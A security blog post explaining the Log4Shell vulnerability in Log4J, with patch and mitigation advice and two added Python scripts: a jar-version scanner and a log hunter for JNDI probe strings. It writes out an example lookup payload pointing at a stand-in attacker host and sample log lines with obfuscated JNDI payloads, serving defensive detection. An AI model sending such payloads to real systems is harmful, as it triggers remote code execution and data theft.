
Log4J Security Issue

This post is a quick summary of the Log4J security issues that unfolded in December 2021.
It includes a summary, a video, a PDF of the slides we presented, and extensive references.

The TL;DR is: update Log4J to 2.16.0 and keep watching for subsequent updates.

The 10,000 Foot View Summary of The Issue

Log4J is a widely used Java library.

It has a problem where, if it is asked to log a string crafted by an attacker, it will fetch
and run the attacker's code on the server doing the logging (CVE-2021-44228, widely called
Log4Shell). This can happen in both authenticated (where we know the user) and unauthenticated
(anonymous) cases, depending on where the application logs untrusted input.

This issue is being actively probed and attacked.

The simplest fix is to patch. I expect further developments, so I recommend watching
for additional updates.

The Rough Detail

Log4J is a logging library that is used in a wide array of applications. I probably used it in
over half of the projects I’ve worked on in my career.

It is very normal for a developer to want to log something that a user enters. For example:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
// "document" is attacker-controlled; vulnerable Log4J evaluates ${...} lookups in it.
String user = getCurrentUser();
String document = request.getParameter("Document");
Logger logger = LogManager.getLogger(Thing.class.getName());
logger.debug("User {} requested document: {}", user, document);

That log statement, where the user and document values are written into the log message, is
where the problem occurs. Vulnerable versions of Log4J scan the formatted message for ${...}
lookup expressions and evaluate them, so an attacker who can get a string such as
${jndi:ldap://attacker-host/x} into the Document parameter (or into any other logged field,
a User-Agent header for instance) makes the server perform a JNDI lookup against a host they
control and load the class it hands back. One clear problem is that statements like this are
everywhere in code, so auditing every one of them is not realistic; the fix has to happen in
the library itself.

The fix is to run a version of Log4J that does not evaluate lookups in the message by default:
2.16.0 removes message lookups entirely and leaves JNDI disabled unless it is explicitly turned
on. If you cannot upgrade yet, versions 2.10 through 2.14.1 can be told not to evaluate lookups
by setting the system property log4j2.formatMsgNoLookups=true (or the environment variable
LOG4J_FORMAT_MSG_NO_LOOKUPS=true); be aware that this mitigation was later shown to be incomplete
in some logging configurations, which is why upgrading is the real answer. In extreme cases, and
for any 2.x version, you can remove the offending class,
org/apache/logging/log4j/core/lookup/JndiLookup.class, from the log4j-core jar.

There are a variety of ways to scan for the issue and to identify log4j library versions
locally. Even a simple approach of looking at your dependency tree (your build tool's dependency
report, for example) can help, with one caveat: log4j-core is often pulled in transitively or
bundled inside fat jars and WARs, so a scan of the deployed artifacts on disk will catch copies
that the dependency files never mention.
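As an added example (not code from the original post or from the Log4J project), the following Python script does the local version check described above: it walks a directory, opens every .jar as a zip, reads the version from the manifest (falling back to the file name) and reports whether the jar is fixed (2.16.0 or later, following this post's recommendation), vulnerable, or has had JndiLookup.class removed as a stop-gap. The jars it builds for the demo are constructed stand-ins, not real libraries, and it deliberately does not open jars nested inside WARs or fat jars, so treat its output as a first pass.

```python
"""Find log4j-core jars on disk and classify each as fixed, mitigated or vulnerable.

Added example, not code from the original post. Standard library only. Jars nested
inside WARs or fat jars are NOT opened; unpack those and rerun before calling a host clean.
"""
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

# The class removed by the "rip it out" mitigation. Fixed releases still ship it
# (2.16.0 disables JNDI by default rather than deleting the class).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PACKAGE_PREFIX = "org/apache/logging/log4j/core/"
FIXED_VERSION = (2, 16, 0)  # the post's recommendation; later releases also pass
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


@dataclass
class Finding:
    path: str
    version: Optional[Tuple[int, int, int]]
    has_jndi_lookup: bool

    @property
    def status(self) -> str:
        if not self.has_jndi_lookup:
            return "mitigated (JndiLookup.class removed)"
        if self.version is None:
            return "unknown version (treat as vulnerable)"
        if self.version >= FIXED_VERSION:
            return "fixed"
        return "vulnerable"


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull the first major.minor[.patch] out of text; patch defaults to 0."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def manifest_version(jar: zipfile.ZipFile) -> Optional[Tuple[int, int, int]]:
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def inspect_jar(path: str) -> Optional[Finding]:
    """Return a Finding for a log4j-core jar (however it is named), None otherwise."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if not any(n.startswith(CORE_PACKAGE_PREFIX) for n in names):
            return None
        version = manifest_version(jar) or parse_version(os.path.basename(path))
        return Finding(path, version, JNDI_LOOKUP_CLASS in names)


def scan_tree(root: str) -> List[Finding]:
    """Walk root and inspect every readable .jar file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".jar"):
                continue
            try:
                finding = inspect_jar(os.path.join(dirpath, name))
            except zipfile.BadZipFile:
                continue  # not a real zip; a real audit would log this
            if finding is not None:
                findings.append(finding)
    return sorted(findings, key=lambda f: f.path)


def build_fake_jar(path: str, version: Optional[str], include_jndi: bool) -> str:
    """Write a constructed stand-in for log4j-core (sample data, not a real library)."""
    with zipfile.ZipFile(path, "w") as jar:
        manifest = "Manifest-Version: 1.0\n"
        if version:
            manifest += f"Implementation-Version: {version}\n"
        jar.writestr("META-INF/MANIFEST.MF", manifest)
        jar.writestr(CORE_PACKAGE_PREFIX + "Logger.class", b"")
        if include_jndi:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return path


def demo_scan() -> dict:
    """Build constructed jars in a temp dir, scan them, return {file name: status}."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        build_fake_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
        build_fake_jar(os.path.join(root, "log4j-core-2.16.0.jar"), "2.16.0", True)
        build_fake_jar(os.path.join(root, "patched.jar"), "2.14.1", False)
        build_fake_jar(os.path.join(root, "lib", "renamed.jar"), None, True)
        with zipfile.ZipFile(os.path.join(root, "other-lib.jar"), "w") as jar:
            jar.writestr("com/example/App.class", b"")  # unrelated jar, must be skipped
        return {os.path.basename(f.path): f.status for f in scan_tree(root)}


if __name__ == "__main__":
    for name, status in demo_scan().items():
        print(f"{name}: {status}")
```

Point scan_tree at an application directory (or an unpacked WAR) to use it for real; anything reported as "unknown version" deserves the same urgency as "vulnerable", because a renamed or re-manifested copy is exactly what a dependency report would miss.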

Timeline

The vulnerability was disclosed to the Apache Log4J security team on 11/24.

It was made public on 12/10.

Patches 2.15.0 and 2.16.0 have been released since then. 2.15.0 turned message lookups off by
default and restricted JNDI lookups to the local host; 2.16.0 removed message lookup support
entirely and disabled JNDI unless explicitly enabled, which is why it is the version to target.

I would look in log files from November forward for malicious activity as soon as possible.
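The log review called for above can be started with a hunt for the lookup string itself. The following Python is added here as an example and is not part of the original post: it normalizes each line (URL-decoding it and collapsing the literal-valued lookups attackers used to disguise the string, such as ${lower:j} and ${::-j}) and then reports every ${jndi:...} it finds together with the JNDI scheme. The log lines are constructed samples in access-log format, and the addresses and hostnames in them are documentation values, not real indicators. Obfuscation is open-ended, so a clean result is not proof of absence; a hit is a reason to pull the surrounding requests and look for outbound LDAP, RMI or DNS from that host.

```python
"""Hunt for Log4Shell probe strings in log lines, including common obfuscations.

Added example, not code from the original post. Each line is URL-decoded, then
literal-valued lookups (${lower:j}, ${upper:j}, ${::-j}, ${env:X:-j}) are collapsed
innermost-first, and the result is searched for ${jndi:...}.
"""
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote

# A lookup with no nested ${...} inside it: ${prefix:body}
SIMPLE_LOOKUP = re.compile(r"\$\{(?P<prefix>[^${}:]*):(?P<body>[^${}]*)\}")
# ${jndi:scheme:...} after normalization; the scheme is optional so a bare "${jndi:" still hits
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?:([a-z][\w+.-]*):)?", re.IGNORECASE)

# Constructed sample access log (documentation addresses, not real indicators).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:03:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [10/Dec/2021:14:04:02 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.10:1099/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:14:04:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/c}"
10.0.0.9 - - [10/Dec/2021:14:05:10 +0000] "GET /login?user=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fd%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:14:06:00 +0000] "GET /docs?Document=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


class Hit(NamedTuple):
    line_no: int
    scheme: Optional[str]
    normalized: str


def _collapse(match) -> str:
    """Replace a literal-valued lookup with its value; leave anything else untouched."""
    prefix = match.group("prefix").lower()
    body = match.group("body")
    if prefix == "jndi":
        return match.group(0)          # the thing we are hunting; never rewrite it
    if prefix == "lower":
        return body.lower()
    if prefix == "upper":
        return body.upper()
    if ":-" in body:                   # ${env:NOPE:-j} and ${::-j} evaluate to the default
        return body.split(":-", 1)[1]
    return match.group(0)              # e.g. ${date:yyyy}: a real lookup, not obfuscation


def normalize(line: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups innermost-first until nothing changes."""
    text = unquote(line)
    for _ in range(max_rounds):
        new = SIMPLE_LOOKUP.sub(_collapse, text)
        if new == text:
            break
        text = new
    return text


def scan_log(text: str) -> List[Hit]:
    """Return one Hit per line that contains a (de-obfuscated) ${jndi:...} lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            hits.append(Hit(n, m.group(1).lower() if m.group(1) else None, norm))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: scheme={hit.scheme}\n  {hit.normalized}")
```

Run it against web-server access logs and the application's own logs: the User-Agent, X-Forwarded-For and query-string fields are where the probes in the wild landed, and any request field your code logs is a candidate.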

A Video

I put together this 17-minute video overview that covers:

  • The issue
  • The payload
  • Fixes
  • Things you want to check
  • References

The Slides

If you want to read and navigate yourself, the slides are here.

References

We looked at a lot of sources as we navigated this issue. Here are some that we thought were helpful:

© 2019-2022 Jemurai. All rights reserved.